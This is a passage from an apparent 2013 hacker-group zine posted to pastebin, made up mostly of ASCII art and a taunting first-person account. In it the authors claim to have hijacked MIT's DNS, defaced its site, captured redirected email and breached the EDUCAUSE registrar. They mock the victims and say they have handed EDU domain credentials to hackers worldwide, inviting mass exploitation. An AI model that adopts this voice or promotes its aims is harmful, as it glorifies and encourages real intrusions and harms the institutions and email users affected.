Advertisement
Guest User

htp5

a guest
May 8th, 2013
621
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 126.48 KB | None | 0 0
  1.  
  2. HTP Zine 5
  3.  
  4. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  5.  
  6. ▄▄▄▄▄▄▄▄▄
  7. ██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro █ █
  8. █████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU ▀▀▀█ █▀▀
  9. ███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode █ █
  10. █▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap █ █▄▄▄▄▄▄▄▄▄
  11. ███ ██ ▄▀ ▀▄ ██ █▓▓ ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri ▀▀▀▀█ █
  12. █▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓ ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD █ █▀█ █
  13. █▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark █ █▄█ █
  14. █▓█ ________________________________ █▓█ > Art █ █▄▄▄▄▄▄
  15. █▓█ HTP____________________MWTB_DLTR ███ > Zerodays ▀▀▀▀▀▀▀█ █
  16. ██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro █ █▀▀▀▀
  17. █▓▓██ █▀▀████████████████████▀▀█ ██▓▓█ > See reverse for █ █▄▄▄▄
  18. ████ ████████████████████▓▓██████ ████ > HTP4 █ █
  19. ▀▀▀▀▀▀▀▀
  20.  
  21. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  22.  
  23.  
  24. █████████████▒████████
  25. ▓▒██████▒░█░███░░ ▒███████████▒
  26. ███████████ ▓█████████████████████▒
  27. ▓████ ▒█████████▒▒░███████████████████████▒
  28. ░▒███████░████████▒██ ▒██████████████████████░
  29. ▓███████████████▒██ ░█ ░████████████████████████░
  30. ████████████████████▒ ███▒█████████████████████████████
  31. ░████████▒██████████████████ ▒█████████████████████████▒
  32. ███████████▒████████████ ▒ ███████████████████████████▒
  33. ▒██████████▒ ░████████████ ▒██▓ ░▒██████████████████████████▒
  34. █████████ ▒███▒ ███████░ ███████████████████████████████████
  35. █████████░██████ █████▒██▓ ▓███████▒▒████████████████████████████
  36. ▒██████████████████ ████▒▓▒█▒ █████████████████████████████████████
  37. ░████████████████████░▓█░ ░█ ░▓███████████████████████████████████
  38. ███████████████████▓ ░ █ ░██████████████████████████████████
  39. ████████████████████ █▒ ██░▒███████████████████████████████████
  40. ▒███████████████████ ▒ ▒▓███▒▓ ███████████████████████████████████
  41. ░██████████████████ █▓▓▓▓█░ █ ████████████░ ░████████████████
  42. ██████████████████ ▓███ █░ █████████████▓██████████████████ █
  43. ██████████████████ ░░ ▓█ ▒ ███████████████████████████████ ▓
  44. ██████████████████░ ▓ █░ █ ███████████████████████████████░
  45. ██████████████████ ██ ▒███ ████████████████████████████████▒█
  46. ███████████████▒██ █ ░▒▒██ ░▒████████████████████████████ █
  47. ███████████████▒▒▒ ███ ████████████████████████████▒ █░
  48. █░ ▓▓██████ ░ ▓█ ████▒ █ ████████████████████████████ █▓
  49. ██████▒ ▒█ ▒ █▓ █ ▓████████████████████████████ ▒█▒
  50. ▓ ▒▒█▓█▓████ ▒▒██▒ ██ ▒▒▒░█████████████████████████████▓██
  51. ███▓ █░ ▒██████░ ░ ░▓███▒ ██████████████████████████████░
  52. ██ █▓ ░████▒▒ ██ ▒ ░▒▒▓█▒ █████████████████████████████
  53. ░ ▓█▓ ██████▓▒ ███ ██ ██▓█▒▓░ ░██████████████████
  54. ▒░ ░███ ████████████▒▒ ▓▓ ▓█░ █ ██████████████████
  55. █▒ ▒██▒ ██████████████ ░ █▒ ▒▒█▒▓ ▒▒▒░██████████████████
  56. ██ ██ ▒▓ ███████████████████ ██▒ ▒███▒▓██▓ █ ░████████████
  57. ██▓█ █ ███████████████████▒ ███▓ ▓█ █▓ ████████████▓
  58. ███ ██████████████████████░▒▒█▒ ▒█ █▒ ██ ██████████▓
  59. █▒█ ████████████████████████ ░░ █▒ ▒ ▓██████████
  60. ▒▒█ ███████████████████████ █ █ ▒ ▒▒█████████▓
  61. █▒ ▒███████████████████████▒ █ ██ ██▒ ██ ░███▒ ██
  62. ██ █ ▒░ ▓███████████████████ ██ ███▒ ▒ ░██ █▒▒ ▒████░░██ ██
  63. █▓███▒ ██▓▒█████████████░ ██ ▓█░░░░██░ █▒ ▒ ░█░ ▓█░░██░
  64. ████▒ █ ▓███████████ ▓███░ █ ▓█ ▒ ▒▓ ███
  65. █████ ███ ████████░ ▒█░ ██ █ ██ ▒▓ ▒ ███ ██
  66. █▓██▓ ██▒ ▒███████▓ █▒ ▓▓ ░███ ██▒▒▒ ▒█░ ███████▒
  67. ▒█░▒ ░ ░█░ ███████▒ ░▓ ▒█████▒███▓░ ▒███▒████░ ███████▒
  68. ▒█████░░ ░▒ ░███████ ░█▓ ░░███ █ █ █ ██████▓
  69. ▒██████ ▒███████████ ░ ▒▒███ ░▓ █ ░ ░█ █████▒
  70. ▒███████▒ ███ ▒██████░███▒▒▒█░ ▒ ▓ █░ █ ░████▓
  71. ███████ ░█░ ░▒ ▓██████ █ ▒█ █░ ▓██░░█▒▒ ▒████▒
  72. ▓███████ ▒█▒ ░██ ▒██ ▒ ███████ ███░████▓██████
  73. /████████ /████████ /██████████████████ /███████████████▄
  74. |▒████████ |████████ |▒██████████████████ |▒█████████████████
  75. |▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
  76. |▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
  77. |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
  78. |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
  79. |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
  80. |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
  81. |▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
  82. |▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
  83. |▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
  84. |▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
  85. |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
  86.  
  87. htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
  88. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  89.  
  90. NORTH KOREA OF THE INTERNET SINCE 2011
  91.  
  92. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  93.  
  94. So its been 182 days since our last zine, since then our dedicated team
  95. of researchers, philanthropists, playboys and troublemakers have been
  96. busy at work scouring the Internet for high quality entertainment at the
  97. expense of everybody who isn't us.
  98.  
  99. 5/1 also marks the day HTP was founded, which means we've had two
  100. glorious years of being the best and owning the rest. Today we will be
  101. drinking 40s, listening to some balla tunes, and circlejerking over the
  102. inevitable confusion, awe, bitterness and jokes that will ensue from
  103. this release. :)
  104.  
  105. Due to the immense size of HTP5, this zine is unfortunately not self
  106. extracting. However do not fret, this zine is full HD and 4D ready.
  107. We've divided everything into its own section just to keep things sane.
  108.  
  109. So go get the popcorn ready and strap in for a long and wild ride. This
  110. zine is a tale of trust, betrayal, brotherhood, rampant paranoia,
  111. hilariously shoddy police work (More on that later), and the plight of
  112. the whitehat sheep being fleeced at will by their blackhat shepherds.
  113. It's really only missing a tacked on love story, a few good car chases,
  114. and an explosion at the end, but it might not be too late for all of that.
  115.  
  116.  
  117. ▀ ▄
  118. █▄▄
  119. ▄____ ░ █▄
  120. ▄ ▄███▀▀ \;',`'-,▓█░
  121. ▓██▀-;_,; ':-;_,'.█▓░
  122. ▓▓██; '/ , _`.-\█▓
  123. ░▓███▄'`. (` /` ` \`|█
  124. ░ ▓▓▓ █|██ `\`-. \_ / |▓
  125. ░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
  126. ░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
  127. ▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
  128. ░██▓▀ ▀█████████████████▄.-'`
  129. ███░ ███▀▀███▀▀███ ███
  130. █████████ ███ ███▄▄███ 2013 ▒ ░
  131. █████████ ███ ██████▀
  132. ███ ███ ███ ███
  133. ▄███▄ ▄███▄ ███ ▄███▄
  134. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  135. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  136.  
  137.  
  138. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
  139.  
  140.  
  141. ░████▓██▓██▓▒▒▒░
  142. ░▒██████▓▓███████▒████▒░░░░
  143. ░▓████████████████▒██▓████▒▒░░ ░░ ░░░░
  144. ░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░
  145. ▒████████████████████████████████▓▓▓██████▓ ▒ ░░
  146. █▓▓███████████████████████████████████████▓▓▓ ░ ░ ░▒
  147. ░▓▓█▓███████████████████████████████████████████░ ▒ ░ ▒░
  148. ▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒ ░
  149. ░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░ ░ ░
  150. ░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒ ░ ░░
  151. ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░
  152. ░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█ ▒░
  153. ░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒
  154. ░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░
  155. ▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒
  156. ▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓
  157. ▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████
  158. █▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓
  159. ░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████
  160. ░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████
  161. ░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████
  162. ▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████
  163. ██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████
  164. ██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████
  165. ████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████
  166. █▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████
  167. ▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████
  168. ▒█▒░ ▓ ░▒▒░ ░ ░░░░▒░░▒▓█▓█████████████████████████████████████████████████
  169. ░█▒░ ░ ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████
  170. ░░ ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████
  171. ░ ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████
  172. ░ ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████
  173. ░ ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░ ░░░▒░▒█████████
  174. ░░░░ ░▒▓▒ ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████
  175. ░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓
  176. ░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓
  177. ░ ░▒▒▒░ ░░▒▒░░ ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓
  178. ░░░░░ ░▒▒░░ ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██
  179. ░░░ ░▒▒░░ ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█
  180. ░░ ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓
  181. ░░ ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓
  182. ░░ ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓
  183. ░░░ ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓
  184. ░░ ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓
  185. ░ ░░░░░ ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓
  186. ░░ ░▒░░░░░ ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓
  187. ░░░░░ ░░▒▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓
  188. ░▓▒▒▒▒▒▓░ ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░
  189. ▒░░░ ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░
  190. ░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░
  191. ░ ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░
  192. ░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒
  193. ░▒▒▒▒▒▒▒▓▓▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░
  194. ░▒▒ ░░░ ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░
  195. ░ ░░░░░ ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░
  196. ░▒▒▓▓▒░░ ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒
  197. ░░░▒▒░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░
  198. ░ ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░
  199. ░ ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░
  200. ░ ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░
  201. ░ ░░░▒▒▒▒▒▒▒▒▒░ ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒
  202. ░░ ░▒▒▒▒▒▒▒▒░░ ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓
  203. ░░░▒▒▒▒▒░░░ ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███
  204. ░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███
  205. ░ ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████
  206. ░ ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒
  207. ░ ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒
  208. ░ ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒
  209. ░ ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓
  210. ░ ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓
  211. ▒ ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒
  212. ▒▒██ ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒
  213. ░▒█▓██▒ ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░
  214. ▓███▓██ ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████
  215. ░░█████▓▒ ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓
  216. ░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒
  217. ░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░
  218. ░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓
  219. ▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░
  220. ░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒
  221. ▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓
  222. ███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░
  223. ███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒
  224. ▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░
  225. ▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██
  226. ░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░
  227. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  228. "What's the score?"
  229. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  230.  
  231. ██ ██ ██ ██ █████ HTP5
  232. ██ ██ ██ ▄▄ ▄▄
  233. ██ ▀▀ ██ ██ ██ FEATURING EDUCAUSE
  234. ▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  235.  
  236. Back in January we decided to upstage Anonymous (again) and have a little fun
  237. with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante.
  238. In doing so, we knew we had to make it very clear that it was an anti-Anonymous
  239. deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus
  240. why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH
  241. ANONYMOUS." Despite all this, some of the cluebags in the media apparently
  242. thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss
  243. leejun y0!" Additionally, almost everybody missed the fact that it was a troll
  244. deface, which just proves that it will be a few decades before we reach October
  245. 1st, 1993.
  246.  
  247. MIT's reaction was particularly lulzy. They did a better job of reporting the
  248. facts than all the media outlets, but they couldn't decide whether the e-mail
  249. got intercepted or not. First, there was this from
  250. http://tech.mit.edu/V132/N62/hack.html:
  251.  
  252. "Unlike previous attacks, which temporarily disabled some services, this attack
  253. had the potential to be much more severe. A more calculated hacker could have
  254. intercepted email messages intended for anyone at the MIT.edu domain, including
  255. all alumni who use alum.mit.edu email addresses."
  256.  
  257. After having a day to do a better post-mortem, MIT started freaking out. They
  258. published this: http://tech.mit.edu/V132/N63/hack.html. From that link:
  259.  
  260. "Unlike previous attacks, which temporarily disabled some services, this attack
  261. had the potential to be much more severe. Email was specifically affected. Mail
  262. is normally received by one of nine different MIT servers; however today, mail
  263. that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at
  264. KAIST, Korea Advanced Institute of Science and Technology, meaning the
  265. attackers had complete control of emails successfully sent during that time."
  266.  
  267. We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail
  268. when we see it :P. So who owned the domain? Well :
  269.  
  270. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  271.  
  272. Domain Name: MIT.EDU
  273.  
  274. Registrant:
  275. Massachusetts Institute of Technology
  276. Cambridge, MA 02139
  277. UNITED STATES
  278.  
  279. Administrative Contact:
  280. I got owned
  281. Massachusetts Institute of Technology
  282. MIT Room W92-167, 77 Massachusetts Avenue
  283. Cambridge, MA 02139-4307
  284. UNITED STATES
  285. (617) 324-1337
  286.  
  287. Technical Contact:
  288. OWNED NETWORK OPERATIONS
  289. ROOT
  290. US
  291. DESTROYED, MA 02139-4307
  292. UNITED STATES
  293. (617) 253-1337
  294.  
  295. Name Servers:
  296. FRED.NS.CLOUDFLARE.COM
  297. KATE.NS.CLOUDFLARE.COM
  298.  
  299. Domain record activated: 23-May-1985
  300. Domain record last updated: 22-Jan-2013
  301. Domain expires: 31-Jul-2013
  302.  
  303. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  304.  
  305.  
  306. Here's the cherry on top:
  307.  
  308. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  309.  
  310.  
  311. From: "CloudFlare Support" <[email protected]>
  312. Subject: [CloudFlare Support] Pending request: Why is cloudflare staff
  313. modifying my dns records? (ticket #12053)
  314. Date: Wed, January 23, 2013 4:48 pm
  315. To: "Fuckmit" <[email protected]>
  316.  
  317. ##- Please type your reply above this line -##
  318.  
  319. [CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns
  320. records? (ticket #12053)
  321.  
  322. This is an email to remind you that your request (#12053) is pending and awaits
  323. your feedback.
  324.  
  325. Please click the link below to review and update your request:
  326. http://support.cloudflare.com/tickets/12053
  327.  
  328. ----------------------------------------------
  329.  
  330. Justin, Jan 22 11:48 am (PST)
  331.  
  332. Hi,
  333.  
  334. We have reason to believe you are not the actual owner of the mit.edu domain.
  335. We have been in contact with the actual owner this morning.
  336.  
  337. As such we have taken steps to secure the account, and the domain has already
  338. been returned to the actual owner.
  339.  
  340. ----------------------------------------------
  341.  
  342. Fuckmit, Jan 22 11:45 am (PST)
  343.  
  344. Two questions:
  345. Why is cloudflare staff modifying my dns records without authorization?
  346. Why is cloudflare staff repeatedly regenerating my API key every time they
  347. decide to modify my dns records without authorization?
  348.  
  349. --------------------------------
  350. This email is a service from CloudFlare Support
  351.  
  352. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  353.  
  354.  
  355. You have reason to believe a user named 'Fuckmit' is not the legitimate owner
  356. of mit.edu? Excellent deduction, Justin.
  357.  
  358. Soon after, we decided to troll Gizmodo and the rest of the media into
  359. preserving our access. The 'browser exploit' on MIT's NOC
  360. ( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website )
  361. never existed. We'd never show our full hand at once, we'd just lose access.
  362.  
  363. MIT certainly believed us though, despite their own reassurances otherwise. For
  364. confirmation, they contacted the root registrar for EDU domains (EDUCAUSE)
  365. after finally asserting that we got access to their EDUCAUSE account.
  366.  
  367. EDUCAUSE then made the fatal mistake of overlooking our complete access into
  368. the EDU TLD. Though, we can't say we expect much from a registrar running ASPX
  369. on their backend.
  370.  
  371. Now, just in case you don't believe us, we have entrusted the login credentials
  372. of nearly every EDU domain to hackers worldwide (active as we speak) within the
  373. MIT section of this zine. So, let's see what happens first, mass exploitation
  374. or whitehat response? ;) We are not ones for defacing, actually, and we're
  375. going to leave that up to the Internet Justice League (AKA Anonymous) if they
  376. can even get to it on time. And we figure they'll manifest some statement
  377. about how its morally justifiable to deface *.edu. We frankly don't care.
  378.  
  379. By the end of today (5/6), EDU operation should return to normal.
  380.  
  381. Moreover, we particularly enjoyed the fact that the first nameserver for
